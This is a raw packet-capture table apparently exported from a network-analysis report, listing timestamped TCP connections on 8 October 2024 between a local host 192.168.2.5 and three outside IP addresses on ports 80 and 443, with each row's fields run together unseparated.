                                                Oct 8, 2024 12:45:19.278124094 CEST8049746158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:19.278341055 CEST4974680192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:19.278538942 CEST4974680192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:19.285403967 CEST8049746158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:19.286271095 CEST44349744188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:19.288029909 CEST49744443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:19.288098097 CEST44349744188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:19.290925026 CEST44349745188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:19.292639017 CEST49745443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:19.292675018 CEST44349745188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:19.424877882 CEST44349745188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:19.425101042 CEST44349745188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:19.425159931 CEST49745443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:19.425462961 CEST49745443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:19.428518057 CEST4973780192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:19.429728985 CEST4975280192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:19.434688091 CEST8049737158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:19.434767008 CEST4973780192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:19.434808969 CEST8049752158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:19.434884071 CEST4975280192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:19.435147047 CEST4975280192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:19.440133095 CEST8049752158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:19.443053961 CEST44349744188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:19.443273067 CEST44349744188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:19.443351984 CEST49744443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:19.443785906 CEST49744443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:19.449680090 CEST4975380192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:19.454766035 CEST8049753158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:19.454840899 CEST4975380192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:19.454963923 CEST4975380192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:19.459839106 CEST8049753158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:20.706177950 CEST8049746158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:20.706379890 CEST8049752158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:20.706418037 CEST8049753158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:20.706542015 CEST8049746158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:20.706671953 CEST4974680192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:20.706975937 CEST8049752158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:20.707040071 CEST8049753158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:20.707067966 CEST4975280192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:20.707084894 CEST4975380192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:20.707326889 CEST8049746158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:20.707369089 CEST4974680192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:20.707871914 CEST8049752158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:20.707923889 CEST8049753158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:20.707925081 CEST4975280192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:20.708012104 CEST49754443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:20.708029985 CEST4975380192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:20.708045959 CEST44349754188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:20.708159924 CEST49754443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:20.708515882 CEST49754443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:20.708528996 CEST44349754188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:20.708821058 CEST49755443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:20.708873987 CEST44349755188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:20.708939075 CEST49755443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:20.709114075 CEST49755443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:20.709131956 CEST44349755188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:20.710355043 CEST4974680192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:20.718184948 CEST8049746158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:20.885792971 CEST8049746158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:20.936822891 CEST4974680192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:20.981102943 CEST49756443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:20.981177092 CEST44349756188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:20.981254101 CEST49756443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:20.987612963 CEST49756443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:20.987641096 CEST44349756188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:21.169584036 CEST44349755188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:21.172380924 CEST49755443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:21.172465086 CEST44349755188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:21.177431107 CEST44349754188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:21.180152893 CEST49754443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:21.180188894 CEST44349754188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:22.339502096 CEST44349754188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:22.339612961 CEST44349754188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:22.339613914 CEST44349755188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:22.339688063 CEST49754443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:22.339853048 CEST44349755188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:22.340044975 CEST49755443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:22.340284109 CEST49754443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:22.340295076 CEST49755443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:22.346617937 CEST4975380192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:22.348725080 CEST44349756188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:22.348795891 CEST49756443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:22.352096081 CEST8049753158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:22.352277994 CEST4975380192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:22.354733944 CEST49756443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:22.354746103 CEST44349756188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:22.355190039 CEST44349756188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:22.368746996 CEST4975280192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:22.374356031 CEST8049752158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:22.374433041 CEST4975280192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:22.376631975 CEST4976380192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:22.381903887 CEST8049763158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:22.382021904 CEST4976380192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:22.382710934 CEST4976380192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:22.387619972 CEST8049763158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:22.400193930 CEST4976280192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:22.405128002 CEST8049762158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:22.405611992 CEST49756443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:22.405618906 CEST4976280192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:22.407651901 CEST4976280192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:22.412556887 CEST8049762158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:22.435102940 CEST49756443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:22.475440025 CEST44349756188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:22.549252033 CEST44349756188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:22.549474001 CEST44349756188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:22.549587011 CEST49756443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:22.622284889 CEST49756443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:22.627741098 CEST4974680192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:22.632839918 CEST8049746158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:22.782272100 CEST8049746158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:22.833815098 CEST49769443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:22.833853006 CEST44349769188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:22.833933115 CEST49769443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:22.833987951 CEST4974680192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:22.834300995 CEST49769443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:22.834314108 CEST44349769188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:22.945955038 CEST8049763158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:22.947171926 CEST49770443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:22.947205067 CEST44349770188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:22.947279930 CEST49770443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:22.947526932 CEST49770443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:22.947540045 CEST44349770188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:22.975163937 CEST8049762158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:22.980866909 CEST49771443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:22.980916977 CEST44349771188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:22.980977058 CEST49771443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:22.999440908 CEST4976380192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:23.017214060 CEST49771443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:23.017232895 CEST44349771188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:23.030601978 CEST4976280192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:23.292041063 CEST44349769188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:23.293598890 CEST49769443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:23.293627977 CEST44349769188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:23.428581953 CEST44349770188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:23.430345058 CEST49770443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:23.430357933 CEST44349770188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:23.461484909 CEST44349769188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:23.461581945 CEST44349769188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:23.461626053 CEST49769443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:23.462038040 CEST49769443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:23.465539932 CEST4974680192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:23.466770887 CEST4977680192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:23.470918894 CEST8049746158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:23.470972061 CEST4974680192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:23.471532106 CEST8049776158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:23.471589088 CEST4977680192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:23.471653938 CEST4977680192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:23.476408005 CEST8049776158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:23.478528976 CEST44349771188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:23.479931116 CEST49771443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:23.479954004 CEST44349771188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:23.570257902 CEST44349770188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:23.570491076 CEST44349770188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:23.570542097 CEST49770443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:23.570873022 CEST49770443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:23.582813025 CEST4976380192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:23.588159084 CEST8049763158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:23.588249922 CEST4976380192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:23.590090990 CEST49778443192.168.2.5149.154.167.220
                                                Oct 8, 2024 12:45:23.590153933 CEST44349778149.154.167.220192.168.2.5
                                                Oct 8, 2024 12:45:23.590239048 CEST49778443192.168.2.5149.154.167.220
                                                Oct 8, 2024 12:45:23.590578079 CEST49778443192.168.2.5149.154.167.220
                                                Oct 8, 2024 12:45:23.590609074 CEST44349778149.154.167.220192.168.2.5
                                                Oct 8, 2024 12:45:23.638765097 CEST44349771188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:23.639214993 CEST44349771188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:23.639358997 CEST49771443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:23.639700890 CEST49771443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:23.643857956 CEST4976280192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:23.644515038 CEST4977980192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:23.649516106 CEST8049779158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:23.649600983 CEST4977980192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:23.649667978 CEST8049762158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:23.649684906 CEST4977980192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:23.649722099 CEST4976280192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:23.654736042 CEST8049779158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:24.033001900 CEST8049776158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:24.034495115 CEST49780443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:24.034548998 CEST44349780188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:24.034845114 CEST49780443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:24.035058022 CEST49780443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:24.035078049 CEST44349780188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:24.077496052 CEST4977680192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:24.229913950 CEST44349778149.154.167.220192.168.2.5
                                                Oct 8, 2024 12:45:24.230019093 CEST49778443192.168.2.5149.154.167.220
                                                Oct 8, 2024 12:45:24.231731892 CEST49778443192.168.2.5149.154.167.220
                                                Oct 8, 2024 12:45:24.231749058 CEST44349778149.154.167.220192.168.2.5
                                                Oct 8, 2024 12:45:24.232079029 CEST44349778149.154.167.220192.168.2.5
                                                Oct 8, 2024 12:45:24.232850075 CEST8049779158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:24.234100103 CEST49785443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:24.234168053 CEST44349785188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:24.234256029 CEST49778443192.168.2.5149.154.167.220
                                                Oct 8, 2024 12:45:24.234283924 CEST49785443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:24.234596014 CEST49785443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:24.234610081 CEST44349785188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:24.279400110 CEST44349778149.154.167.220192.168.2.5
                                                Oct 8, 2024 12:45:24.280591011 CEST4977980192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:24.473495960 CEST44349778149.154.167.220192.168.2.5
                                                Oct 8, 2024 12:45:24.473640919 CEST44349778149.154.167.220192.168.2.5
                                                Oct 8, 2024 12:45:24.473716974 CEST49778443192.168.2.5149.154.167.220
                                                Oct 8, 2024 12:45:24.487277031 CEST49778443192.168.2.5149.154.167.220
                                                Oct 8, 2024 12:45:24.495922089 CEST44349780188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:24.497636080 CEST49780443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:24.497688055 CEST44349780188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:25.566428900 CEST44349780188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:25.566701889 CEST44349780188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:25.566869020 CEST49780443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:25.569046974 CEST44349785188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:25.577276945 CEST49780443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:25.620424986 CEST49785443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:25.620476007 CEST44349785188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:25.720218897 CEST4978780192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:25.725286961 CEST8049787158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:25.725445032 CEST4978780192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:25.726545095 CEST4978780192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:25.727993011 CEST44349785188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:25.728230953 CEST44349785188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:25.728305101 CEST49785443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:25.728950024 CEST49785443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:25.731544971 CEST8049787158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:25.739100933 CEST4977980192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:25.740328074 CEST4978880192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:25.744765997 CEST8049779158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:25.744832039 CEST4977980192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:25.745327950 CEST8049788158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:25.745408058 CEST4978880192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:25.745522022 CEST4978880192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:25.750313044 CEST8049788158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:26.295466900 CEST8049787158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:26.297121048 CEST49794443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:26.297173023 CEST44349794188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:26.297257900 CEST49794443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:26.297597885 CEST49794443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:26.297616005 CEST44349794188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:26.325903893 CEST8049788158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:26.327471018 CEST49795443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:26.327564955 CEST44349795188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:26.327666998 CEST49795443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:26.327943087 CEST49795443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:26.327979088 CEST44349795188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:26.343108892 CEST4978780192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:26.374363899 CEST4978880192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:26.885333061 CEST44349794188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:26.887414932 CEST49794443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:26.887434959 CEST44349794188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:26.906704903 CEST44349795188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:26.908833981 CEST49795443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:26.908873081 CEST44349795188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:27.018052101 CEST44349794188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:27.018285036 CEST44349794188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:27.018349886 CEST49794443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:27.019221067 CEST49794443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:27.023652077 CEST4978780192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:27.025101900 CEST4980180192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:27.029055119 CEST8049787158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:27.029123068 CEST4978780192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:27.030039072 CEST8049801158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:27.030122042 CEST4980180192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:27.030214071 CEST4980180192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:27.035017014 CEST8049801158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:27.041320086 CEST44349795188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:27.041557074 CEST44349795188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:27.042135954 CEST49795443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:27.042504072 CEST49795443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:27.045635939 CEST4978880192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:27.047168016 CEST4980280192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:27.051486015 CEST8049788158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:27.051815987 CEST4978880192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:27.052063942 CEST8049802158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:27.052341938 CEST4980280192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:27.052342892 CEST4980280192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:27.057302952 CEST8049802158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:27.596740007 CEST8049801158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:27.598258972 CEST49803443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:27.598304033 CEST44349803188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:27.598391056 CEST49803443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:27.598634958 CEST49803443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:27.598651886 CEST44349803188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:27.616992950 CEST8049802158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:27.618415117 CEST49804443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:27.618427038 CEST44349804188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:27.618515015 CEST49804443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:27.618844986 CEST49804443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:27.618858099 CEST44349804188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:27.640021086 CEST4980180192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:27.671224117 CEST4980280192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:28.074799061 CEST44349803188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:28.076894045 CEST49803443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:28.076924086 CEST44349803188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:28.099375010 CEST44349804188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:28.104935884 CEST49804443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:28.104963064 CEST44349804188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:28.284638882 CEST44349803188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:28.284755945 CEST44349803188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:28.284868002 CEST49803443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:28.285646915 CEST49803443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:28.289659023 CEST4980180192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:28.290859938 CEST4981080192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:28.295494080 CEST8049801158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:28.295835972 CEST8049810158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:28.295907974 CEST4980180192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:28.295969963 CEST4981080192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:28.296086073 CEST4981080192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:28.301109076 CEST8049810158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:28.307322025 CEST44349804188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:28.307466984 CEST44349804188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:28.307550907 CEST49804443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:28.308094025 CEST49804443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:28.321928978 CEST4980280192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:28.322868109 CEST49811443192.168.2.5149.154.167.220
                                                Oct 8, 2024 12:45:28.322907925 CEST44349811149.154.167.220192.168.2.5
                                                Oct 8, 2024 12:45:28.323020935 CEST49811443192.168.2.5149.154.167.220
                                                Oct 8, 2024 12:45:28.323545933 CEST49811443192.168.2.5149.154.167.220
                                                Oct 8, 2024 12:45:28.323569059 CEST44349811149.154.167.220192.168.2.5
                                                Oct 8, 2024 12:45:28.327250004 CEST8049802158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:28.331056118 CEST4980280192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:28.858182907 CEST8049810158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:28.860287905 CEST49817443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:28.860335112 CEST44349817188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:28.860548973 CEST49817443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:28.860796928 CEST49817443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:28.860805988 CEST44349817188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:28.905765057 CEST4981080192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:28.943136930 CEST44349811149.154.167.220192.168.2.5
                                                Oct 8, 2024 12:45:28.943326950 CEST49811443192.168.2.5149.154.167.220
                                                Oct 8, 2024 12:45:28.945094109 CEST49811443192.168.2.5149.154.167.220
                                                Oct 8, 2024 12:45:28.945102930 CEST44349811149.154.167.220192.168.2.5
                                                Oct 8, 2024 12:45:28.945453882 CEST44349811149.154.167.220192.168.2.5
                                                Oct 8, 2024 12:45:28.947427034 CEST49811443192.168.2.5149.154.167.220
                                                Oct 8, 2024 12:45:28.995402098 CEST44349811149.154.167.220192.168.2.5
                                                Oct 8, 2024 12:45:29.188708067 CEST44349811149.154.167.220192.168.2.5
                                                Oct 8, 2024 12:45:29.188889980 CEST44349811149.154.167.220192.168.2.5
                                                Oct 8, 2024 12:45:29.188949108 CEST49811443192.168.2.5149.154.167.220
                                                Oct 8, 2024 12:45:29.195173979 CEST49811443192.168.2.5149.154.167.220
                                                Oct 8, 2024 12:45:29.328841925 CEST44349817188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:29.330581903 CEST49817443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:29.330610991 CEST44349817188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:29.471345901 CEST44349817188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:29.471493959 CEST44349817188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:29.471554995 CEST49817443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:29.472096920 CEST49817443192.168.2.5188.114.97.3
